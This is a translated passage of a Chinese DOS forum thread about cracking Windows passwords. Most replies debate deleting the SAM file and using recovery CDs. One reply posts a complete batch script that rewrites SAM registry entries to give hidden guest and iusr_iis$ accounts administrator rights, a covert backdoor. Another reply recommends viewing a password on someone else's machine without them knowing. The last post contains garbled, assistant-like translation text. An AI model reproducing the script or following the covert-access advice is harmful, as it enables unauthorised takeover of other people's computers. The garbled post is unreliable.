China DOS Union

-- Unite DOS · Advance DOS · Grow DOS --

Union site: www.cn-dos.net Forum site: www.cn-dos.net/forum
DOS stands for freedom, openness and progress. Let us work hard, learn from the openness and GNU spirit of FreeDOS and Linux, and together build and grow a free GNU GPL world!

中国DOS联盟论坛
The time now is 2026-07-28 17:11
中国DOS联盟论坛 » 其它操作系统综合讨论区 » How to crack a password View 4,696 Replies 28
Floor 16 Posted 2007-02-05 00:28 ·  中国 四川 雅安 电信
新手上路
Credits 11
Posts 4
Joined 2007-02-03 03:53
19-year member
UID 78481
Gender Male
Status Offline
What you said is problematic. Deleting sam in XP will make the host unable to log in. It's still okay in 98. I haven't used ME, 2000, NT, but it's not okay in XP. If the sam file is broken, it will make the system fall into an infinite loop. The password cracking tool in MS-DOS can be used, it's an exe file, not large and very convenient. My home http://www.oookillooo.ys168.com/ I will do my best to help with problems. Help give a boost. Thanks.
Floor 17 Posted 2007-02-25 02:58 ·  中国 浙江 台州 温岭市 电信
高级用户
★★
DOS学徒
Credits 526
Posts 252
Joined 2007-02-12 05:35
19-year member
UID 79286
Gender Male
Status Offline
I don't know how, but it seems that discharging on Winxp might work
Floor 18 Posted 2007-02-25 09:50 ·  中国 辽宁 朝阳 联通
铂金会员
★★★★
痴迷DOS者
Credits 5,798
Posts 1,924
Joined 2003-06-20 00:00
23-year member
UID 5583
Gender Male
From 金獅電腦軟體工作室
Status Offline
Originally posted by weilong888 at 2006-5-23 22:06:
Don't be so annoying. Go to DOS, delete the SAM file, and there will be no information set by the original user. You can enter without a password.



This method is effective for Windows 2000, but not for XP and 2003 systems.
熟能生巧,巧能生精,一艺不精,终生无成,精亦求精,始有所成,臻于完美,永无止境!
金狮電腦軟體工作室愿竭诚为您服务!
QQ群:8393170(定期清理不发言者)
个人网站:http://www.520269.cn
电子邮件:doujiehui@vip.qq.com
微信公众号: doujiehui
Floor 19 Posted 2007-02-25 09:55 ·  中国 辽宁 朝阳 联通
铂金会员
★★★★
痴迷DOS者
Credits 5,798
Posts 1,924
Joined 2003-06-20 00:00
23-year member
UID 5583
Gender Male
From 金獅電腦軟體工作室
Status Offline
熟能生巧,巧能生精,一艺不精,终生无成,精亦求精,始有所成,臻于完美,永无止境!
金狮電腦軟體工作室愿竭诚为您服务!
QQ群:8393170(定期清理不发言者)
个人网站:http://www.520269.cn
电子邮件:doujiehui@vip.qq.com
微信公众号: doujiehui
Floor 20 Posted 2007-02-25 10:14 ·  中国 浙江 台州 电信
管理员
★★★★
DOS非常爱好者
Credits 6,215
Posts 2,601
Joined 2006-01-20 13:00
20-year member
UID 49256
Status Offline
This topic has had many versions in relevant magazines and on the internet. Some say it works, some say it doesn't, making people confused and at a loss. It's very necessary to practice!
I remember there was a special introduction in the April issue of Dian Ai Magazine this year! Now there are many people repeating what others say. Most people haven't tried all systems and possible environments on their own computers, or there may be particularities in their own computer situations.

[ Last edited by 雨露 on 2007-2-24 at 09:24 PM ]
Floor 21 Posted 2007-02-25 17:31 ·  中国 辽宁 朝阳 联通
铂金会员
★★★★
痴迷DOS者
Credits 5,798
Posts 1,924
Joined 2003-06-20 00:00
23-year member
UID 5583
Gender Male
From 金獅電腦軟體工作室
Status Offline
Download the Deep Mountain Red Leaf System Maintenance CD Version V25. There are options on the CD boot system menu to recover passwords.
熟能生巧,巧能生精,一艺不精,终生无成,精亦求精,始有所成,臻于完美,永无止境!
金狮電腦軟體工作室愿竭诚为您服务!
QQ群:8393170(定期清理不发言者)
个人网站:http://www.520269.cn
电子邮件:doujiehui@vip.qq.com
微信公众号: doujiehui
Floor 22 Posted 2007-02-27 09:05 ·  中国 江西 上饶 电信
中级用户
★★
Credits 274
Posts 119
Joined 2006-10-17 09:48
19-year member
UID 66098
Status Offline
ghost Elevate Privileges.. Found in the forum.

@echo guest.bat ^<zpid^> ^<password^>
@echo __________________________________________________________
@rem This guest.bat automatically clones guest to the administrators group.
@rem If username exists, it means running the bat in a terminal login environment. Need to manually enter the pid value.
@rem It's best to manually modify the password first. Execute this program twice. Haha. Mainly because there's no obfuscation. regedit is time-consuming.
@set zpath=%path%
@set zcd=%cd%
@set path=%path%;%windir%;%windir%\system32

:start
@net user guest |find /i "*Domain" &&echo Domain Controller, Dont clone. ADD user! &&goto DOMAIN
@if NOT "%USERNAME%"=="" echo username=[%username%],term_login mode. input PID. &&goto Term

:start1
@pulist.exe |findstr.exe /i "WINLOGON.exe" >a
@setx.exe a -f a -a 0,1 >b
@FOR /F "eol=; tokens=1,2,3* delims=, " %%i in (b) do @set zpid=%%i
@goto AUTO

:Term
@if "%1"=="" goto USAGE
@if NOT "%2"=="" net user guest %2
@if NOT "%2"=="" net user |find /i "tsinternetuser" >nul &&net user tsinternetuser %2
@set zpid=%1


:AUTO
@echo Make admg.reg admt.reg admiis.reg
@psu.exe -p "%windir%\regedit.exe -e admin.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4" -i %zpid% >nul
@psu.exe -p "%windir%\regedit.exe -e name.$$$ HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names" -i %zpid% >nul
@echo Windows Registry Editor Version 5.00 >admg.reg
@echo Windows Registry Editor Version 5.00 >admt.reg
@echo [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5]>>admg.reg
@echo [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003e8]>>admt.reg
@type admin.reg >a &echo "Unicode -->>> ansi . find.exe use it ansi." &if exist b del b
@echo "F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,\>>b
@setx.exe a -f a -a 4,0 |find "," >>b
@setx.exe a -f a -a 5,0 |find "," >>b
@setx.exe a -f a -a 6,0 |find "," >>b
@type b >>admg.reg
@type b >>admt.reg

:IIS
@set zda=no
@echo iusr_iis exec
@type name.$$$ >name.reg
@copy name.reg name.txt >nul
@FOR /L %%i IN (5,3,30) DO @(setx.exe a -f name.reg -a %%i,0 |find /i "IUSR_IIS$" &&set zda=%%i)
@if "%zda%" =="no" goto PSU
@rep.exe "IUSR_IIS$" name.txt /R /I >nul
@rep.exe "Editor" name.txt /R /I >nul
@find.exe /v /n "" name.txt >n1
@findstr /I "%zda%" n1 >name.iis
@setx a -f name.iis -a 0,1 -d () >zdc
@del n1
@del name.iis
@del name.$$$
@del name.txt
@del a
@del b

@For /F "tokens=1,2* delims= " %%i in (zdc) do @(echo %%i>zdd)
@For /F "tokens=1,2* delims= " %%i in (zdd) do @(set zdd=%%i)
@copy admg.reg admiis.reg >nul
@echo rep.exe "1f5" "%zdd%" admiis.reg /I
@rep.exe "1f5" "%zdd%" admiis.reg /I
@del zdc
@del zdd

:PSU
@attrib -s -r admg.bak >nul
@attrib -s -r admt.bak >nul
@copy admg.bak admg.reg >nul
@copy admt.bak admt.reg >nul
@psu.exe -p "%windir%\regedit.exe -s admg.reg" -i %zpid% >nul
@psu.exe -p "%windir%\regedit.exe -s admt.reg" -i %zpid% >nul

@if NOT "%zda%"=="no" psu.exe -p "%windir%\regedit.exe -s admiis.reg" -i %zpid% >nul
@if NOT "%zda%"=="no" net user iusr_iis$ /active:yes >nul
@if NOT "%zda%"=="no" net user iusr_iis$ /active:no >nul

@copy admg.reg admg.bak >nul
@copy admt.reg admt.bak >nul
@attrib admg.bak +r +s >nul
@attrib admt.bak +r +s >nul

@net user guest /active:yes >nul
@net user guest /active:no >nul
@net user |find /I "tsinternetuser" || goto NEXT
@net user tsinternetuser /active:yes >nul
@net user tsinternetuser /active:no >nul
@if exist admin.reg del admin.reg /f >nul
@if exist admg.reg del admg.reg /f >nul
@if exist admt.reg del admt.reg /f >nul
:Next
@goto end


:DOMAIN
@rem add user iusr_iis$
@if "%2"=="" echo "not input guest of password" &&goto END
@net user |find /i "iusr_iis" >nul ||net user iusr_iis$ %2 /add
@net localgroup administrators |find /i "iusr_iis$" >nul ||net localgroup administrators iusr_iis$ /add
@goto END

:USAGE
@pulist.exe |findstr.exe /i "WINLOGON explorer"
@echo " system.bat zpid <password> "
@echo " Need cur winlogon PID ,Term_mode,Must this Term_login_winlogon_pid. "
@goto end1

:END
@echo ________ALL User IN administrators :
@net localgroup administrators
:END1
@echo psu.exe -p "%windir%\regedit.exe -s admiis.reg" -i %zpid%
@set path=%zpath%
@set zpath=
@set zcd=
@set zda=
@set zdb=
@set zdd=
@set zpid=
Floor 23 Posted 2007-02-28 00:15 ·  中国 辽宁 朝阳 联通
铂金会员
★★★★
痴迷DOS者
Credits 5,798
Posts 1,924
Joined 2003-06-20 00:00
23-year member
UID 5583
Gender Male
From 金獅電腦軟體工作室
Status Offline
What if the GUEST user is disabled? So it's still better to use a dedicated recovery CD to achieve it.
熟能生巧,巧能生精,一艺不精,终生无成,精亦求精,始有所成,臻于完美,永无止境!
金狮電腦軟體工作室愿竭诚为您服务!
QQ群:8393170(定期清理不发言者)
个人网站:http://www.520269.cn
电子邮件:doujiehui@vip.qq.com
微信公众号: doujiehui
Floor 24 Posted 2007-04-24 11:57 ·  中国 湖北 黄冈 电信
高级用户
★★★
Credits 894
Posts 411
Joined 2007-02-17 12:15
19-year member
UID 79697
Gender Male
Status Offline
Typing "set" shows the password, which is really stupid.

The function of "set" is to display and set environment variables. Saying it can display the password is really.....
@set c= 不知则觉多,知则觉少,越知越多,便觉越来越少. --- 知多少.
@for,/l,%%i,in,(1,1,55)do,@call,set/p=%%c:~%%i,1%%<nul&ping/n 1 127.1>nul


Floor 25 Posted 2007-04-24 12:04 ·  中国 湖北 黄冈 电信
高级用户
★★★
Credits 894
Posts 411
Joined 2007-02-17 12:15
19-year member
UID 79697
Gender Male
Status Offline
What the 16th floor said is right. Don't post "you can log in by deleting the sam file" again to avoid misleading.
@set c= 不知则觉多,知则觉少,越知越多,便觉越来越少. --- 知多少.
@for,/l,%%i,in,(1,1,55)do,@call,set/p=%%c:~%%i,1%%<nul&ping/n 1 127.1>nul


Floor 26 Posted 2007-06-27 17:00 ·  中国 江苏 无锡 教育网
初级用户
Credits 31
Posts 15
Joined 2007-06-26 16:48
19-year member
UID 92397
Gender Male
Status Offline
Got it, if I forget the password in the future, there will be a way to get it back.
Floor 27 Posted 2007-06-29 20:36 ·  中国 湖北 黄冈 电信
中级用户
★★
Credits 376
Posts 164
Joined 2006-12-05 01:28
19-year member
UID 72582
Gender Male
Status Offline
You can download my USB flash drive system (in the multimedia section). There is a WINXPE in it. After booting, there is a program to directly view the password of the XP system on the hard drive. It is better than cracking the password for two reasons: First, you want to know the password of someone else's machine but don't want others to know that you have touched their machine; Second, NTFS has an encryption function. If you directly clear the password, such as PASSWD under DOS, it may make encrypted files unopenable (not tried, just guessed). So use my system, it is in Chinese version (you can change the language in OPTION). Everyone can try it. I used to like network security very much and got the Network Security Engineer certificate in 2003, but I have never engaged in this kind of work. Let everyone laugh.
Floor 28 Posted 2007-07-03 04:22 ·  中国 内蒙古 锡林郭勒盟 锡林浩特市 电信
新手上路
Credits 17
Posts 9
Joined 2006-10-18 21:09
19-year member
UID 66504
Status Offline
Let's try it, whether it's true or false.
Floor 29 Posted 2008-08-04 10:44 ·  中国 浙江 杭州 电信
新手上路
Credits 14
Posts 5
Joined 2008-07-30 11:02
17-year member
UID 122376
Gender Male
Status Offline
Typically, the `SET` command alone won't display passwords directly. Are you sure you're using the right context or there are specific conditions? Let me double - check. Wait, no, according to general usage, the `SET` command doesn't reveal passwords by default. So the translation of your text is: Input SET can see the password??? Why can't I see it?
Forum Jump: